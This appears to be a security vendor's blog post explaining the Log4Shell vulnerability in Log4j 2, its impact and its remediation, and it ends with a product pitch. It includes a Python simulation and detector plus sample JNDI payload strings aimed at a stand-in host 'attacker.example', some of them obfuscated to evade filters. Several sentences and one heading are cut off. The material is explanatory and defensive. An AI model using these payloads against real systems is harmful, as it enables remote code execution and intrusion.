At the end of 2021 a vulnerability was disclosed in Log4j, a Java logging library that large organizations, including some of the world's biggest tech firms, use to record events in their applications. It wreaked havoc on the internet on a global scale: within hours of disclosure, attackers were scanning for and exploiting vulnerable systems, with new attempts arriving by the minute.
“This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), said on a phone call shared with CNN at the time.
In this blog, we'll break down how it started, what the impact was, and what happens (or should happen) next.
The Inception: What is Log4j?
Log4j is an Apache Java logging library that applications use to record events: errors, user actions, requests and other activity on a server or device. Beyond writing plain messages, Log4j 2 supports "lookups", ${...} placeholders that it expands at logging time with values such as environment variables, system properties or, via JNDI, data fetched from a directory service, and it integrates with many other components of the Java ecosystem.
Log4j is widely used across consumer and enterprise systems: it sits behind consumer services such as iCloud, Steam and Minecraft, and inside products from Fortinet, IBM, Microsoft, Red Hat, Salesforce, Siemens and other major vendors.
What is the Log4j vulnerability?
Known as Log4Shell (CVE-2021-44228), it is a remote code execution (RCE) vulnerability in Log4j 2 that, if left unmitigated, lets a threat actor run arbitrary Java code on a target server and take control of it. The troubling part is how easy it is to exploit and that it requires no authentication: an attacker only needs to get a crafted string such as ${jndi:ldap://attacker-host/x} (attacker-host standing in for a server the attacker controls) into any value the application logs, whether a request header, a username or a chat message. Log4j resolves the JNDI lookup, fetches an attacker-supplied Java class from that server and executes it with the application's privileges.
And it gets worse.
The vulnerability allows malicious actors to run their own software on the system or plant backdoors to maintain persistent, ongoing access long after the initial exploit.
Timeline of Events:
The Impact:
Log4j is ubiquitous: it can be found in nearly everything written in Java or that depends on Java software. Some major, recognizable platforms impacted include Apple, Amazon, Google, Cloudflare, Twitter and Minecraft.
Exploitation is simple and does not require authentication. For example, a bad actor
How Does It Work Exactly?
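The substitution step that makes the vulnerability exploitable, as an added illustration that is not Log4j's own code: the Python below is a deliberately simplified model of how Log4j 2 (before 2.15.0) expanded ${...} lookups inside logged message text, with the JNDI lookup recorded instead of performed so it runs offline. The host attacker.example and the sample User-Agent strings are constructed for the example. It shows why an unauthenticated request header is enough to trigger the lookup, why disabling lookups (log4j2.formatMsgNoLookups=true) stops the expansion, and why a detector scanning captured traffic or logs has to normalize nested lookups before matching on "jndi:".

```python
"""Simplified Python model of Log4j 2 message-lookup substitution.

Added example, not Log4j's own code. Before 2.15.0, Log4j 2 scanned the
*message text* it was asked to log for ${prefix:value} lookups and expanded
them, including the jndi lookup that fetched and ran a remote Java class.
Here the JNDI lookup is recorded instead of performed, so the script runs
offline. Hostnames and sample requests are constructed for the example.
"""
import re

# Innermost ${...} (its body contains no nested "${", "{" or "}")
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
MAX_PASSES = 20  # cap on nesting depth so hostile input cannot loop forever


def resolve_lookups(message, lookups_enabled=True, jndi_calls=None):
    """Expand ${...} lookups the way a vulnerable Log4j 2 would.

    Returns the substituted text. Each JNDI URL that Log4j would have
    contacted is appended to ``jndi_calls`` instead of being fetched.
    Supported lookups: lower, upper, jndi and the ${key:-default} syntax;
    unknown lookups are left in place, as Log4j does.
    """
    if jndi_calls is None:
        jndi_calls = []
    if not lookups_enabled:
        # Behaviour with -Dlog4j2.formatMsgNoLookups=true: the message is
        # written verbatim and no lookup code runs.
        return message

    def substitute(match):
        body = match.group(1)
        lookup, has_default, default = body.partition(":-")
        prefix, _, value = lookup.partition(":")
        key = prefix.lower()
        if key == "lower":
            return value.lower()
        if key == "upper":
            return value.upper()
        if key == "jndi":
            jndi_calls.append(value)      # real Log4j contacts this URL here
            return "<jndi-result>"
        if has_default:
            return default                # ${::-j} -> "j": unknown key, default used
        return match.group(0)             # unknown lookup stays as written

    # One pass resolves one nesting level, so ${${lower:J}ndi:...} becomes
    # ${jndi:...} and is resolved on the next pass.
    for _ in range(MAX_PASSES):
        expanded = LOOKUP.sub(substitute, message)
        if expanded == message:
            break
        message = expanded
    return message


def log_request(user_agent, lookups_enabled=True):
    """Simulate a web app logging a request's User-Agent through Log4j 2.

    Returns (text written to the log, list of JNDI URLs Log4j would contact).
    """
    jndi_calls = []
    line = resolve_lookups("GET / ua=" + user_agent, lookups_enabled, jndi_calls)
    return line, jndi_calls


def find_jndi_lookups(text):
    """Detection helper: normalize a captured header or log line with the
    same substitution rules and return the JNDI targets it would trigger.
    This catches obfuscated payloads that a plain search for 'jndi:' misses."""
    calls = []
    resolve_lookups(text, True, calls)
    return calls


# Constructed sample User-Agent values (not real traffic).
SAMPLES = [
    "Mozilla/5.0 (X11; Linux x86_64)",                                   # benign
    "${jndi:ldap://attacker.example:1389/Exploit}",                      # plain payload
    "${${lower:J}ndi:${lower:LDAP}://attacker.example:1389/Exploit}",    # case juggling
    "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example:1099/x}",     # default-value trick
]

if __name__ == "__main__":
    for ua in SAMPLES:
        for enabled in (True, False):
            line, calls = log_request(ua, lookups_enabled=enabled)
            mode = "vulnerable" if enabled else "mitigated "
            print(f"{mode}: {line!r} -> JNDI {calls}")
        print("detector  :", find_jndi_lookups(ua))
```

Two practical caveats follow from the model. First, the obfuscated samples show why early WAF rules that matched the literal string "jndi:" were bypassed within days; a detector has to expand the nesting (or match on the ${ syntax itself) before deciding. Second, the lookups_enabled=False branch models the formatMsgNoLookups flag, which was later shown to be incomplete in some configurations (CVE-2021-45046); the reliable fix is to upgrade to a release that removes the message lookup and JNDI class loading (2.17.1 or later for Java 8, 2.12.4 for Java 7, 2.3.2 for Java 6) rather than to rely on the flag.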
The Aftermath:
We may not be hearing as much about it in the news, but organizations are still struggling to identify and patch affected systems because of how pervasive the Log4j library is: it is often bundled several dependencies deep inside third-party software, so a package inventory does not always reveal it. Many organizations remain unpatched because of the complexity of updating software across multiple interdependent systems at once. Others are relying on the fact that their affected systems are not directly exposed to the Internet to delay patching. However, those systems can still be reached: a logged string passed along from an Internet-facing application to an internal service carries the payload with it, and an attacker who already has a foothold inside the network can target them directly. Once compromised, an internal system is as big a threat as a public one.
It is estimated to impact hundreds of organizations and thousands of systems. That number continues to rise as researchers—and criminals—continue to scan the Internet for affected systems.
How Can Trava Help?
Trava’s comprehensive risk assessment platform can help in several areas:
Download Trava's Complete Guide to Vulnerability Scan types that details
Then schedule a demo to see Trava's vulnerability risk assessment tool in action.